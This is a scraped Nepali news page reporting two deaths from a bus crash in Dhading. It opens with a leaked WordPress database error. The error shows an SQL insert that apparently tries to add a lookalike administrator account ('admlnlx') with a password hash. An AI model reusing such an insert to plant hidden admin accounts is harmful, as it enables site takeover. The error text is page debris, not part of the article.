WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2ODP2gdO76f2JhI/WWdx.OPGF8MkH.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 07:28:10', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ ४ –
धादिङको खाल्टे–५ पतेनीमा बस दुर्घटना हुँदा गम्भीर घाइते भएका दुई जनाको उपचारका क्रममा ज्यान गएको छ ।
काठमाडौंको ट्रमा सेन्टरमा उपचारका क्रममा सोमबार राति धादिङ खैरेनी–९ का ४५ वर्षका माधवप्रसाद अधिकारी र धादिङ खान्ने–५ का २५ वर्षका सन्तोष जम्मरकट्टेलको ज्यान गएको प्रहरीले जनाएको छ ।
ट्रमा सेन्टरमा अन्य १७ जना घाइतेको उपचार भइरहेको छ । यस्तै दुई जना घाइतेको धादिङमा नै उपचार भइरहेको छ भने ३ जना उपचार पछि घर फर्किएका छन् ।
सोमबार बेलुका सरदमुकाम धादिङबेसीबाट खाल्टे गाविसको फ्याक्सेका लागि छुटेको बा ३ ख ८२६३ नम्बरको बस दुर्घटनामा परेको हो ।